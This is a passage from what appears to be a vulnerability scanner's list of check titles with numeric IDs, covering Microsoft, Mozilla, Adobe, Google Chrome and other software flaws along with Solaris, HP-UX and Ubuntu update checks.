Vulnerability (967183) [901047] MS Windows License Logging Server Remote Code Execution Vulnerability (974783) [901041] Microsoft Internet Explorer Multiple Code Execution Vulnerabilities (974455) [901039] Vulnerabilities in Windows Media Runtime Could Allow Remote Code Execution (975682) [900973] Microsoft Office Word Remote Code Execution Vulnerability (976307) [900964] Microsoft .NET Common Language Runtime Code Execution Vulnerability (974378) [900944] Microsoft IIS FTP Server 'ls' Command DOS Vulnerability [900929] Microsoft JScript Scripting Engine Remote Code Execution Vulnerability (971961) [900898] Microsoft Internet Explorer 'XSS Filter' XSS Vulnerabilities - Nov09 [900897] Microsoft Internet Explorer PDF Information Disclosure Vulnerability - Nov09 [900891] Microsoft Internet Denial Of Service Vulnerability - Nov09 [900887] Microsoft Office Excel Multiple Vulnerabilities (972652) [900878] Microsoft Products GDI Plus Code Execution Vulnerabilities (957488) [900874] Microsoft IIS FTP Service Remote Code Execution Vulnerabilities (975254) [900863] Microsoft Internet Explorer 'window.print()' DOS Vulnerability [900837] Microsoft DHTML Editing Component ActiveX Remote Code Execution Vulnerability (956844) [900836] Microsoft Internet Explorer Address Bar Spoofing Vulnerability [900826] Microsoft Internet Explorer 'location.hash' DOS Vulnerability [900813] Microsoft Remote Desktop Connection Remote Code Execution Vulnerability (969706) [900809] Microsoft Visual Studio ATL Remote Code Execution Vulnerability (969706) [900808] Microsoft Visual Products Version Detection [900799] Ruby Interpreter Version Detection (Windows) [900752] XnView DICOM Parsing Integer Overflow Vulnerability (Windows) [900741] Microsoft Internet Explorer Information Disclosure Vulnerability Feb10 [900725] Ruby Interpreter Heap Overflow Vulnerability (Windows) - Dec09 [900724] Windows XP 'SPI_GETDESKWALLPAPER' DoS Vulnerability [900711] Microsoft IIS WebDAV Remote Authentication Bypass Vulnerability [900690] Microsoft Virtual PC/Server Privilege Escalation Vulnerability (969856) [900689] Microsoft Embedded OpenType Font Engine Remote Code Execution Vulnerabilities (961371)) [900670] Microsoft Office Excel Remote Code Execution Vulnerabilities (969462) [900669] Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (968537) [900668] Vulnerability in RPC Could Allow Elevation of Privilege (970238) [900602] RPC portmapper [900589] Microsoft ISA Server Privilege Escalation Vulnerability (970953) [900588] Microsoft DirectShow Remote Code Execution Vulnerability (961373) [900567] Microsoft IIS Security Bypass Vulnerability (970483) [900566] Microsoft Active Directory LDAP Remote Code Execution Vulnerability (969805) [900479] PostgreSQL Version Detection (Windows) [900476] Microsoft Excel Remote Code Execution Vulnerabilities (968557) [900461] Microsoft MSN Live Messneger Denial of Service Vulnerability [900445] Microsoft Autorun Arbitrary Code Execution Vulnerability (08-038) [900400] Microsoft Internet Explorer Unicode String DoS Vulnerability [900391] Microsoft Office Publisher Remote Code Execution Vulnerability (969516) [900366] Microsoft Internet Explorer Web Script Execution Vulnerabilites [900365] Microsoft Office Word Remote Code Execution Vulnerabilities (969514) [900337] Microsoft Internet Explorer Denial of Service Vulnerability - Apr09 [900328] Microsoft Internet Explorer Remote Code Execution Vulnerability (963027) [900322] Tor Replay Attack Vulnerability (Windows) [900314] Microsoft XML Core Service Information Disclosure Vulnerability [900303] Microsoft Internet Explorer HTML Form Value DoS Vulnerability [900302] MS Windows taskmgr.exe Information Disclosure Vulnerability [900299] Microsoft Report Viewer Information Disclosure Vulnerability (2578230) [900298] MS Windows Remote Access Service NDISTAPI Driver Privilege Elevation Vulnerability (2566454) [900294] Microsoft Data Access Components Remote Code Execution Vulnerabilities (2560656) [900288] Microsoft Distributed File System Remote Code Execution Vulnerabilities (2535512) [900287] Microsoft SMB Client Remote Code Execution Vulnerabilities (2536276) [900285] Microsoft Foundation Class (MFC) Library Remote Code Execution Vulnerability (2500212) [900283] Windows Kernel-Mode Drivers Privilege Elevation Vulnerabilities (2506223) [900282] Microsoft DNS Resolution Remote Code Execution Vulnerability (2509553) [900279] Microsoft SMB Client Remote Code Execution Vulnerabilities (2511455) [900278] Microsoft Internet Explorer Multiple Vulnerabilities (2497640) [900273] Microsoft Remote Desktop Client Remote Code Execution Vulnerability (2508062) [900267] Microsoft Media Decompression Remote Code Execution Vulnerability (2447961) [900262] Microsoft Internet Explorer Multiple Vulnerabilities (2416400) [900261] Microsoft Office PowerPoint Remote Code Execution Vulnerabilities (2293386) [900246] Microsoft Media Decompression Remote Code Execution Vulnerability (979902) [900245] Microsoft Data Analyzer and IE Developer Tools ActiveX Control Vulnerability (980195) [900229] Microsoft Data Analyzer ActiveX Control Vulnerability (978262) [900228] Microsoft Office (MSO) Remote Code Execution Vulnerability (978214) [900223] Microsoft Ancillary Function Driver Elevation of Privilege Vulnerability (956803) [900218] IBM DB2 Server Detection (Windows) [900192] Microsoft Internet Explorer Information Disclosure Vulnerability [900187] Microsoft Internet Explorer Argument Injection Vulnerability [900170] Microsoft iExplorer '&NBSP [900131] Microsoft Internet Explorer Denial of Service Vulnerability [900128] CuteNews Version Detection for Windows [900125] Microsoft SQL Server 2000 sqlvdir.dll ActiveX Buffer Overflow Vulnerability [900123] Apple iTunes Version Detection for Windows [900120] Microsoft Organization Chart Remote Code Execution Vulnerability [900097] Vulnerability in Microsoft DirectShow Could Allow Remote Code Execution [900095] Microsoft ISA Server and Forefront Threat Management Gateway DoS Vulnerability (961759) [900094] Vulnerabilities in Windows Could Allow Elevation of Privilege (959454) [900093] Microsoft DirectShow Remote Code Execution Vulnerability (961373) [900092] Windows HTTP Services Could Allow Remote Code Execution Vulnerabilities (960803) [900086] Vulnerabilities in Windows Kernel Could Allow Remote Code Execution (958690) [900080] Vulnerabilities in Microsoft Office Visio Could Allow Remote Code Execution (957634) [900079] Vulnerabilities in Microsoft Exchange Could Allow Remote Code Execution (959239) [900064] Vulnerability in Microsoft Office SharePoint Server Could Cause Elevation of Privilege (957175) [900063] Vulnerabilities in Microsoft Office Word Could Allow Remote Code Execution (957173) [900061] Vulnerabilities in Microsoft Office Excel Could Allow Remote Code Execution (959070) [900060] Vulnerabilities in Windows Media Components Could Allow Remote Code Execution (959807) [900058] Microsoft XML Core Services Remote Code Execution Vulnerability (955218) [900052] Windows Internet Printing Service Allow Remote Code Execution Vulnerability (953155) [900051] Windows Kernel Elevation of Privilege Vulnerability (954211) [900049] Host Integration Server RPC Service Remote Code Execution Vulnerability (956695) [900048] Microsoft Excel Remote Code Execution Vulnerability (956416) [900047] Microsoft Office nformation Disclosure Vulnerability (957699) [900046] Microsoft Office Remote Code Execution Vulnerabilities (955047) [900045] Windows Media Player 11 Remote Code Execution Vulnerability (954154) [900044] Windows Media Encoder 9 Remote Code Execution Vulnerability (954156) [900036] Opera Version Detection for Windows [900034] Windows Messenger Could Allow Information Disclosure Vulnerability (955702) [900033] Microsoft PowerPoint Could Allow Remote Code Execution Vulnerabilities (949785) [900029] Microsoft Office Filters Could Allow Remote Code Execution Vulnerabilities (924090) [900028] Microsoft Excel Could Allow Remote Code Execution Vulnerabilities (954066) [900025] Microsoft Office Version Detection [900012] Enumerates List of Windows Hotfixes [900006] Microsoft Word Could Allow Remote Code Execution Vulnerability [900004] Microsoft Access Snapshot Viewer ActiveX Control Vulnerability [900003] Apple Safari Detect Script (Windows) [900002] Apple Safari for Windows Multiple Vulnerabilities July-08 [900001] Opera for Windows Unspecified Code Execution Vulnerabilities July-08 [860852] Fedora Update for libtirpc FEDORA-2008-1017 [860389] Fedora Update for libtirpc FEDORA-2008-9204 [855770] Solaris Update for rpc.nisd 140917-02 [855741] Solaris Update for rpc.nisd 140918-02 [855685] Solaris Update for rpc.nisd 140917-01 [855672] Solaris Update for rpc.nisd 140918-01 [855563] Solaris Update for /usr/lib/netsvc/rwall/rpc.rwalld 112847-01 [855554] Solaris Update for librpcsvc 127549-01 [855522] Solaris Update for librpcsvc 127548-01 [855518] Solaris Update for rpc.ypupdated 139986-01 [855515] Solaris Update for usr/sbin/rpc.metad 139967-01 [855503] Solaris Update for rpcsec_gss 126929-02 [855466] Solaris Update for OpenWindows 3.6.1 108117-06 [855441] Solaris Update for ypserv/ypxfrd/rpc.yppasswdd 114342-12 [855436] Solaris Update for rpc.ypupdated 138886-01 [855419] Solaris Update for librpcsvc 123397-01 [855408] Solaris Update for rpc.ypupdated 138575-01 [855393] Solaris Update for OpenWindows 3.6.2 111626-04 [855385] Solaris Update for rpc.ypupdated 140102-01 [855364] Solaris Update for librpcsvc 123396-01 [855334] Solaris Update for OpenWindows 3.6.2 113792-01 [855317] Solaris Update for /usr/lib/netsvc/rwall/rpc.rwalld 112875-01 [855246] Solaris Update for OpenWindows 3.7.3 119903-02 [855227] Solaris Update for /usr/lib/netsvc/rwall/rpc.rwalld 112846-01 [855223] Solaris Update for usr/sbin/rpc.metad 138574-01 [855208] Solaris Update for rpc.ypupdated 138576-01 [855196] Solaris Update for NFS Daemon, rpcmod 113278-22 [855173] Solaris Update for OpenWindows 3.7.0 112811-02 [855158] Solaris Update for rpcsec_gss 126928-02 [855128] Solaris Update for rpc.ypupdated 138885-01 [855124] Solaris Update for nfs and rpcmod 116960-21 [855123] Solaris Update for nfs and rpcmod 116959-21 [855098] Solaris Update for NFS Daemon, rpcmod 119439-15 [855057] Solaris Update for OpenWindows 3.6.2 110286-16 [855014] Solaris Update for usr/sbin/rpc.metad 140106-01 [841137] Ubuntu Update for xmlrpc-c USN-1527-2 [840391] Ubuntu Update for xmlrpc-c vulnerabilities USN-890-5 [840163] Ubuntu Update for krb5, librpcsecgss vulnerability USN-511-2 [840047] Ubuntu Update for krb5, librpcsecgss vulnerability USN-511-1 [835182] HP-UX Update for rpcbind HPSBUX02370 [835143] HP-UX Update for rpc.yppasswdd HPSBUX00242 [835134] HP-UX Update for rpcbind Software HPSBUX00169 [835116] HP-UX Update for rpc.ypupdated HPSBUX01002 [835113] HP-UX Update for rpc.mountd HPSBUX00272 [835102] HP-UX Update for rpc.yppasswdd HPSBUX02295 [835100] HP-UX Update for rpc.ttdbserverd HPSBUX00168 [835057] HP-UX Update for RPC HPSBUX00252 [835039] HP-UX Update for RPC HPSBUX01020 [835012] HP-UX Update for rpc.ttdbserver HPSBUX00199 [830306] Mandriva Update for librpcsecgss MDKSA-2007:181 (librpcsecgss) [803479] Adobe Acrobat Multiple Vulnerabilities - Windows [803456] Adobe Air Multiple Vulnerabilities - December12 (Windows) [803454] Adobe Air Multiple Vulnerabilities - November12 (Windows) [803451] Adobe Air Multiple Vulnerabilities - October 12 (Windows) [803354] Mozilla Thunderbird Multiple Vulnerabilities-02 November12 (Windows) [803353] Mozilla SeaMonkey Multiple Vulnerabilities-02 November12 (Windows) [803352] Mozilla Thunderbird ESR Multiple Vulnerabilities-01 November12 (Windows) [803351] Mozilla Thunderbird Multiple Vulnerabilities-01 November12 (Windows) [803350] Mozilla SeaMonkey Multiple Vulnerabilities-01 November12 (Windows) [803349] Mozilla Firefox ESR Multiple Vulnerabilities-01 November12 (Windows) [803347] Mozilla Firefox ESR Code Execution Vulnerabilities - November12 (Windows) [803336] Oracle Java SE JDK Multiple Vulnerabilities - February 2012 (Windows - 03) [803335] Oracle Java SE JDK Multiple Vulnerabilities - February 2012 (Windows - 02) [803334] Oracle Java SE JDK Multiple Vulnerabilities - February 2012 (Windows - 01) [803127] Google Chrome Multiple Vulnerabilities-03 Dec2012 (Windows) [803121] Google Chrome Multiple Vulnerabilities-02 Dec2012 (Windows) [803118] Google Chrome Multiple Vulnerabilities-01 Dec2012 (Windows) [803103] Oracle VM VirtualBox Unspecified Denial of Service Vulnerability (Windows) [803102] Pidgin MXit Message Parsing Buffer Overflow Vulnerability (Windows) [803086] LibreOffice XML Manifest Handling Buffer Overflow Vulnerabilities (Windows) [803084] LibreOffice Graphic Object Loading Buffer Overflow Vulnerability (Windows) [803083] OpenOffice Multiple Buffer Overflow Vulnerabilities - Dec12 (Windows) [803081] Adobe Photoshop Camera Raw Plug-in Code Execution Vulnerabilities (Windows) [803074] Adobe Flash Player Multiple Vulnerabilities - December12 (Windows) [803070] Wireshark Multiple Dissector Multiple Vulnerabilities - Dec12 (Windows) [803068] Wireshark Multiple Dissector Multiple DoS Vulnerabilities - Dec12 (Windows) [803064] LibreOffice Import Files Denial of Service Vulnerabilities (Windows) [803061] Mozilla Firefox Code Execution Vulnerabilities - November12 (Windows) [803059] Mozilla Firefox Multiple Vulnerabilities - November12 (Windows) [803057] Mozilla Firefox Multiple Vulnerabilities-02 November12 (Windows) [803055] Mozilla Firefox Multiple Vulnerabilities-01 November12 (Windows) [803047] Apple QuickTime Multiple Vulnerabilities - Nov12 (Windows) [803044] Adobe Flash Player Multiple Vulnerabilities - November12 (Windows) [803043] RealPlayer Watch Folders Function Buffer Overflow Vulnerability (Windows) [803040] Mozilla Firefox Multiple Vulnerabilities - November12 (Windows) [803038] Google SketchUp '.SKP' File Memory Corruption Vulnerability (Windows) [803028] Microsoft Internet Explorer Remote Code Execution Vulnerability (2757760) [803025] Adobe Photoshop PNG Image Processing Buffer Overflow Vulnerabilities (Windows) [803021] Oracle Java SE JRE AWT Component Unspecified Vulnerability - (Windows) [803020] Oracle Java SE JRE Multiple Remote Code Execution Vulnerabilities - (Windows) [803017] Mozilla Firefox Multiple Vulnerabilities - August12 (Windows) [803015] Mozilla Firefox Multiple Vulnerabilities - August12 (Windows) [803013] Mozilla Products Memory Corruption Vulnerabilities - August12 (Windows) [803011] Mozilla Products Multiple Vulnerabilities - August12 (Windows) [803001] Opera Multiple Vulnerabilities - August12 (Windows) [802996] Mozilla Firefox 'WebSockets' Denial of Service Vulnerability (Windows) [802994] Mozilla Firefox Multiple Vulnerabilities-01 (Windows) [802991] Mozilla Firefox Security Bypass Vulnerabilities - Oct 12 (Windows) [802989] Mozilla Firefox Multiple Vulnerabilities - Oct 12 (Windows) [802986] Adobe Flash Player Multiple Vulnerabilities - October 12 (Windows) [802985] VERITAS Backup Exec Remote Agent Windows Servers BOF Vulnerability [802978] Wireshark LDP PPP and HSRP dissector Multiple Vulnerabilities (Windows) [802975] Google Chrome Windows Kernel Memory Corruption Vulnerability [802972] Google Chrome Multiple Vulnerabilities - Sep12 (Windows-01) [802962] Apple iTunes Multiple Vulnerabilities - Sep 12 (Windows) [802960] Adobe LiveCycle Designer Untrusted Search Path Vulnerability (Windows) [802954] Adobe Reader Multiple Unspecified Vulnerabilities - Windows [802952] Adobe Flash Player Multiple Vulnerabilities -01 August 12 (Windows) [802951] Oracle Java SE Java Runtime Environment Multiple Unspecified Vulnerabilities(02) - (Windows) [802950] Oracle Java SE Java Runtime Environment Unspecified Vulnerability - (Windows) [802949] Oracle Java SE Java Runtime Environment Multiple Unspecified Vulnerabilities(01) - (Windows) [802948] Oracle Java SE Java Runtime Environment Multiple Unspecified Vulnerabilities - (Windows) [802947] Oracle Java SE Java Runtime Environment Code Execution Vulnerability - (Windows) [802945] Wireshark Multiple Vulnerabilities(01) - August 2012 (Windows) [802944] Wireshark Multiple Vulnerabilities - August 2012 (Windows) [802943] Wireshark GSM RLC MAC dissector Buffer Overflow Vulnerability (Windows) [802940] Adobe Flash Player Font Parsing Code Execution Vulnerability - (Windows) [802938] Adobe Shockwave Player Multiple Vulnerabilities - August 2012 (Windows) [802936] Adobe Reader Multiple Vulnerabilities - Windows [802935] Pidgin 'Libpurple' Cipher API Information Disclosure Vulnerability (Windows) [802932] Google Chrome PDF Viewer Multiple Vulnerabilities (Windows) [802928] Google Chrome Multiple Vulnerabilities - August 12 (Windows) [802925] Apple Safari Multiple Vulnerabilities - Aug 2012 (Windows) [802922] VLC Media Player OGG Demuxer Buffer Overflow Vulnerability (Windows) [802920] VLC Media Player 'MP4' Denial of Service Vulnerability (Windows) [802917] Google Chrome Multiple Vulnerabilities(01) - July 12 (Windows) [802912] Microsoft Unauthorized Digital Certificates Spoofing Vulnerability (2728973) [802907] Wireshark Multiple Denial of Service Vulnerabilities - July 12 (Windows) [802906] Pidgin MSN and XMPP Denial of Service Vulnerabilities (Windows) [802898] Wireshark PPP And NFS Dissector Denial of Service Vulnerabilities (Windows) [802895] Mozilla Products Memory Corruption Vulnerabilities - July12 (Windows) [802893] Mozilla Products Certificate Page Clickjacking Vulnerability (Windows) [802891] Mozilla Firefox Multiple Vulnerabilities - July12 (Windows) [802889] Mozilla Products Multiple Vulnerabilities - July12 (Windows) [802886] Microsoft Sidebar and Gadgets Remote Code Execution Vulnerability (2719662) [802880] Google Chrome Multiple Vulnerabilities - July 12 (Windows) [802871] Adobe Flash Player Multiple Vulnerabilities June-2012 (Windows) [802869] Mozilla Products 'jsinfer.cpp' Denial of Service Vulnerability (Windows) [802865] Mozilla Products Multiple Vulnerabilities - June12 (Windows) [802864] Microsoft XML Core Services Remote Code Execution Vulnerability (2719615) [802848] Google Chrome Multiple Denial of Service Vulnerabilities - May 12 (Windows) [802842] Mozilla Products Security Bypass Vulnerability - May12 (Windows) [802840] Mozilla Products Multiple Vulnerabilities - May12 (Windows) [802835] Google Chrome Multiple Vulnerabilities-02 - April 12 (Windows) [802831] EMC NetWorker 'nsrexecd' RPC Packet Denial of Service Vulnerability [802820] Mozilla Products Multiple Vulnerabilities - Mar12 (Windows) [802811] Adobe Flash Player Multiple Vulnerabilities (Windows) - Mar12 [802807] Google Chrome Multiple Denial of Service Vulnerabilities - March12 (Windows) [802806] Microsoft IIS Default Welcome Page Information Disclosure Vulnerability [802803] Adobe Flash Player Multiple Vulnerabilities (Windows) - Feb12 [802796] Apple Safari Webkit Multiple Vulnerabilities - May 12 (Windows) [802795] Apple QuickTime Multiple Vulnerabilities - (Windows) [802792] Google Chrome Multiple Vulnerabilities - May 12 (Windows) [802790] Adobe Illustrator Multiple Unspecified Vulnerabilities (Windows) [802782] Adobe Photoshop BOF and Use After Free Vulnerabilities (Windows) [802781] Adobe Flash Professional JPG Object Processing BOF Vulnerability (Windows) [802779] Adobe Shockwave Player Multiple Code Execution and DoS Vulnerabilities (Windows) [802774] Microsoft VPN ActiveX Control Remote Code Execution Vulnerability (2695962) [802772] Adobe Flash Player Object Confusion Remote Code Execution Vulnerability (Windows) [802761] Wireshark Multiple Vulnerabilities - April 12 (Windows) [802760] Wireshark IEEE 802.11 Dissector Denial of Service Vulnerability (Windows) [802759] Wireshark Multiple Denial of Service Vulnerabilities - April 12 (Windows) [802748] Adobe Reader Multiple Vulnerabilities April-2012 (Windows) [802732] Google Chrome Multiple Vulnerabilities - April 12 (Windows) [802726] Microsoft SMB Signing Disabled [802722] VLC Media Player Multiple Vulnerabilities - Mar 12 (Windows) [802717] Google Chrome 'History navigation' Arbitrary Code Execution Vulnerability (Windows) [802714] Google Chrome 'GPU process' Multiple Vulnerabilities (Windows) [802713] Pidgin Multiple Denial of Service Vulnerabilities (Windows) [802708] Microsoft Internet Explorer Code Execution and DoS Vulnerabilities [802700] Google Chrome 'HTTP session' Information Disclosure Vulnerability (Windows) [802684] IBM Director CIM Server CIMListener Directory Traversal Vulnerability (Windows) [802681] Oracle Java SE Hash Collision DoS Vulnerability (Windows) [802680] Oracle Java SE 'MurmurHash' Algorithm Hash Collision DoS Vulnerability (Windows) [802670] PHP pdo_sql_parser.re 'PDO' extension DoS vulnerability (Windows) [802652] Opera URL Processing Arbitrary Code Execution Vulnerability (Windows) [802649] Opera Multiple Denial of Service Vulnerabilities - June12 (Windows) [802646] Opera Multiple Vulnerabilities - June12 (Windows) [802612] Oracle Java SE JRE Multiple Vulnerabilities - February 2012 (Windows - 03) [802611] Oracle Java SE JRE Multiple Vulnerabilities - February 2012 (Windows - 02) [802610] Oracle Java SE JRE Multiple Vulnerabilities - February 2012 (Windows - 01) [802600] IBM SPSS SamplePower 'VsVIEW6' ActiveX Control Multiple Code Execution Vulnerabilities (Windows) [802597] Google Chrome Multiple Vulnerabilities - February 12 (Windows 01) [802594] Google Chrome Multiple Vulnerabilities - February 12 (Windows) [802592] Mozilla Products XBL Binding Memory Corruption Vulnerability - (Windows) [802591] PHP 'magic_quotes_gpc' Directive Security Bypass Vulnerability (Windows) [802590] PHP 'php_register_variable_ex()' Remote Code Execution Vulnerability (Windows) [802581] Mozilla Products Multiple Unspecified Vulnerabilities - Feb12 (Windows 01) [802580] Mozilla Products Multiple Unspecified Vulnerabilities - Feb12 (Windows) [802579] Mozilla Products IPv6 Literal Syntax Cross Domain Information Disclosure Vulnerability (Windows) [802566] PHP Multiple Denial of Service Vulnerabilities (Windows) [802562] Strawberry Perl Modules Multiple Vulnerabilities (Windows) [802558] Adobe Reader/Acrobat Multiple Memory Corruption Vulnerabilities - Windows [802557] LibreOffice 'DOC' File Denial of Service Vulnerability (Windows) [802547] Mozilla Firefox Cache Objects History Enumeration Weakness Vulnerability (Windows) [802545] Mozilla Products Multiple Information Disclosure Vulnerabilities - (Windows) [802542] Adobe Reader/Acrobat 'U3D' Component Memory Corruption Vulnerability - Windows [802540] Adobe Flash Player 'SWF' File Multiple Code Execution Vulnerability - Windows [802518] Mozilla Products XSS and Memory Corruption Vulnerabilities (Windows) [802517] Mozilla Products Privilege Escalation Vulnerabily (Windows) [802511] Mozilla Products Multiple Vulnerabilities (Windows) [802510] Mozilla Products Browser Engine Denial of Service Vulnerabilities (Windows) [802509] Mozilla Products 'NoWaiverWrapper' Privilege Escalation Vulnerability (Windows) [802508] Adobe Shockwave Player Multiple Vulnerabilities (Windows) - Nov 2011 [802505] FFFTP Untrusted Search Path Vulnerability (Windows) [802504] PHP 'is_a()' Function Remote Arbitrary Code Execution Vulnerability (Windows) [802503] Wireshark CSN.1 Dissector Denial of Service Vulnerability (Windows) [802502] Wireshark Heap Based BOF and Denial of Service Vulnerabilities (Windows) [802499] Apple Safari Webcore Webkit 'XSSAuditor.cpp' XSS Vulnerability (Windows) [802496] Google Chrome Webcore Webkit 'XSSAuditor.cpp' XSS Vulnerability (Windows) [802490] Google Chrome Multiple Vulnerabilities - Nov2012 (Windows) [802488] VLC Media Player 'libpng_plugin' Denial of Service Vulnerability (Windows) [802485] Adobe Shockwave Player Multiple Vulnerabilities Nov-2012 (Windows) [802482] Oracle Java SE JRE Multiple Unspecified Vulnerabilities-04 oct12 (Windows) [802481] Oracle Java SE JRE Multiple Unspecified Vulnerabilities-03 oct12 (Windows) [802480] VLC Media Player TiVo Demuxer Double Free Vulnerability (Windows) [802479] Oracle Java SE JRE Multiple Unspecified Vulnerabilities-02 oct12 (Windows) [802478] Oracle Java SE JRE Multiple Unspecified Vulnerabilities-01 Oct (Windows) [802473] Google Chrome Multiple Vulnerabilities-02 Oct12 (Windows) [802470] Google Chrome Multiple Vulnerabilities-01 Oct12 (Windows) [802468] Compatibility Issues Affecting Signed Microsoft Binaries (2749655) [802462] Microsoft ActiveSync Null Pointer Dereference Denial Of Service Vulnerability [802451] Google Chrome Multiple Vulnerabilities - Sep12 (Windows) [802450] Opera Address Bar Spoofing Vulnerability (Windows) [802444] XnView Multiple Image Decompression Heap Overflow Vulnerabilities (Windows) [802443] XnView PSD Record Type Parsing Integer Overflow Vulnerabilities (Windows) [802435] Opera 'X.509' Certificates Spoofing Vulnerability (Windows) [802420] VLC Media Player '.amr' File Denial of Service Vulnerability (Windows) [802403] MS Windows Fraudulent Digital Certificates Spoofing Vulnerability (2641690) [802398] Adobe Shockwave Player Multiple Vulnerabilities - Feb 2012 (Windows) [802395] Opera Large Integer Argument Denial of Service Vulnerability (Windows) [802374] Google Chrome Multiple Denial of Service Vulnerabilities - January12 (Windows) [802365] Opera Cache History Information Disclosure Vulnerability (Windows) [802363] Opera Multiple Information Disclosure Vulnerabilities (Windows) [802361] Opera Multiple Vulnerabilities - December11 (Windows) [802358] Google Chrome Cache History Information Disclosure Vulnerabilities (Windows) [802355] Google Chrome Multiple Information Disclosure Vulnerabilities (Windows) [802349] PHP EXIF Header Denial of Service Vulnerability (Windows) [802345] Google Chrome Multiple Vulnerabilities - November11 (Windows) [802343] ChaSen Buffer Overflow Vulnerability (Windows) [802340] EtherApe RPC Packet Processing Denial of Service Vulnerability [802338] Google Chrome Mozilla Network Security Services Privilege Escalation Vulnerability (Windows) [802332] Opera Extended Validation Information Disclosure Vulnerabilities (Windows) [802330] PHP Multiple Vulnerabilities (Windows) - Sep 2011 [802326] Google Chrome multiple vulnerabilities - September11 (Windows) [802316] Google Chrome Multiple Vulnerabilities - August11 (Windows) [802314] Ecava IntegraXor Multiple Cross-Site Scripting Vulnerabilities (Windows) [802313] Google Picasa JPEG Image Processing Remote Code Execution Vulnerability (Windows) [802309] XnView File Search Path Executable File Injection Vulnerability (Windows) [802303] Google Chrome WebGL Texture Information Disclosure Vulnerability (Windows) [802300] Tor Directory Authority 'policy_summarize' Denial of Service Vulnerability (Windows) [802292] IBM Informix Dynamic Server 'oninit.exe' Buffer Overflow Vulnerability (Windows) [802287] Microsoft Internet Explorer Cache Objects History Information Disclosure Vulnerability [802286] Microsoft Internet Explorer Multiple Information Disclosure Vulnerabilities [802284] Apple Safari JavaScript Implementation Information Disclosure Vulnerability (Windows) [802282] Apple Safari WebKit Information Disclosure Vulnerability (Windows) [802278] Oracle Java SE Java Runtime Environment Unspecified Vulnerability - October 2011 (Windows) [802277] Oracle Java SE Java Runtime Environment Unspecified Vulnerability - October 2011 (Windows) [802276] Oracle Java SE Multiple Vulnerabilities - October 2011 (Windows04) [802275] Oracle Java SE Multiple Vulnerabilities - October 2011 (Windows03) [802274] Oracle Java SE Multiple Vulnerabilities - October 2011 (Windows02) [802273] Oracle Java SE Multiple Vulnerabilities - October 2011 (Windows01) [802262] Google Chrome Multiple Vulnerabilities - October11 (Windows) [802255] Google Chrome Multiple Vulnerabilities - October11 (Windows) [802249] Wireshark Lua Script File Arbitrary Code Execution Vulnerability (Windows) [802248] Wireshark Multiple Denial of Service Vulnerabilities (Windows) [802237] Apple Safari Secure Cookie Security Bypass Vulnerability (Windows) [802227] IBM Lotus Symphony Multiple Vulnerabilities (Windows) [802219] Mozilla Products Multiple Vulnerabilities July-11 (Windows) - 04 [802218] Mozilla Products Multiple Vulnerabilities July-11 (Windows) - 03 [802217] Mozilla Products Multiple Vulnerabilities July-11 (Windows) - 02 [802216] Mozilla Products Multiple Vulnerabilities July-11 (Windows) - 01 [802215] Mozilla Firefox Security Bypass Vulnerability July-11 (Windows) [802214] Mozilla Products Multiple Denial of Service Vulnerabilities July-11 (Windows) [802213] Mozilla Products Multiple Vulnerabilities July-11 (Windows) [802212] Mozilla Firefox Multiple Vulnerabilities July-11 (Windows) [802211] Mozilla Products WebGL Information Disclosure Vulnerability July-11 (Windows) [802206] Adobe Products Unspecified Cross-Site Scripting Vulnerability June-2011 (Windows) [802203] Microsoft Internet Explorer Cookie Hijacking Vulnerability [802202] Microsoft Internet Explorer Cookie Hijacking Vulnerability [802201] Wireshark 'bytes_repr_len' Function Denial of Service Vulnerability (Windows) [802200] Wireshark Multiple Denial of Service Vulnerabilities (Windows) [802198] Apple QuickTime Multiple Denial of Service Vulnerabilities - (Windows) [802175] Mozilla Products Multiple Vulnerabilities - Oct 2011 (Windows 01) [802174] Mozilla Products Enter Key Dialog Bypass and Use-After-Free Memory Corruption Vulnerabilities (Windows) [802173] Mozilla Products 'YARR' Code Execution Vulnerability (Windows) [802172] Mozilla Products Same Origin Policy Bypass Vulnerability (Windows) [802171] Mozilla Products Browser Engine Multiple Unspecified Vulnerabilities (Windows) [802170] Mozilla Firefox Memory Corruption and Integer Underflow Vulnerabilities (Windows) [802169] Mozilla Products Multiple Vulnerabilities - Oct 2011 (Windows) [802166] Adobe Reader and Acrobat Multiple Vulnerabilities September-2011 (Windows) [802165] Adobe Reader Unspecified Vulnerability (Windows) [802163] Calendar Manager Service rpc.cmsd Service Detection [802153] Mozilla Products Multiple Vulnerabilities - Sep 11 (Windows) [802152] Mozilla Products Information Disclosure and Security Bypass Vulnerabilities (Windows) [802151] Mozilla Products Multiple Vulnerabilities - Sep 11 (Windows) [802150] Mozilla Products Multiple Vulnerabilities (Windows) [802149] Mozilla Firefox Untrusted Search Path Vulnerability (Windows) [802147] Mozilla Products 'SVG' Code Execution Vulnerability (Windows) [802141] Opera 'HTTPS-Session' Multiple Vulnerabilities (Windows) [802138] Mozilla Firefox Multiple Vulnerabilities August-11 (Windows) [802137] Nfs-utils rpc.rquotad Service Detection [802133] Apple QuickTime Multiple Buffer Overflow Vulnerabilities (Windows) [802126] Google Chrome 'GetWidget' methods DoS Vulnerability (Windows) [802119] VLC Media Player 'AMV' Denial of Service Vulnerability (Windows) [802113] Opera Browser 'SRC' Denial of Service Vulnerability (Windows) [802112] Opera Browser Multiple Vulnerabilities Jul-11 (Windows) [802111] Opera Browser Multiple Vulnerabilities Jul-11 (Windows) [802110] Adobe Reader and Acrobat Multiple BOF Vulnerabilities June-2011 (Windows) [802107] Opera Browser Multiple Vulnerabilities Jul-11 (Windows) [802102] Google Chrome Multiple Vulnerabilities - June 11(Windows) [802100] Mozilla Firefox SSL Certificate Spoofing Vulnerability (Windows) [801951] Novell iPrint Client 'printer-url' Multiple BOF Vulnerabilities (Windows) [801937] IBM solidDB RPC Test Commands Denial of Service Vulnerabilities [801935] Microsoft Silverlight Multiple Memory Leak Vulnerabilities [801934] Microsoft Silverlight Version Detection [801921] Adobe Products Arbitrary Code Execution Vulnerability (Windows) [801905] Mozilla Products Browser Engine Multiple Unspecified Vulnerabilities March-11 (Windows) [801904] Mozilla Products Buffer Overflow Vulnerability March-11 (Windows) [801903] Mozilla Products Multiple Unspecified Vulnerabilities March-11 (Windows) [801902] Mozilla Products Multiple Vulnerabilities March-11 (Windows) [801898] TigerVNC SSL Certificate Validation Security Bypass Vulnerability (Windows) [801897] TigerVNC Version Detection (Windows) [801890] Google Chrome Multiple Denial of Service Vulnerabilities - May11 (Windows) [801887] Mozilla Products Unspecified Vulnerability May-11 (Windows) [801886] Mozilla Firefox Multiple Unspecified Vulnerabilities May-11 (Windows) [801885] Mozilla Products 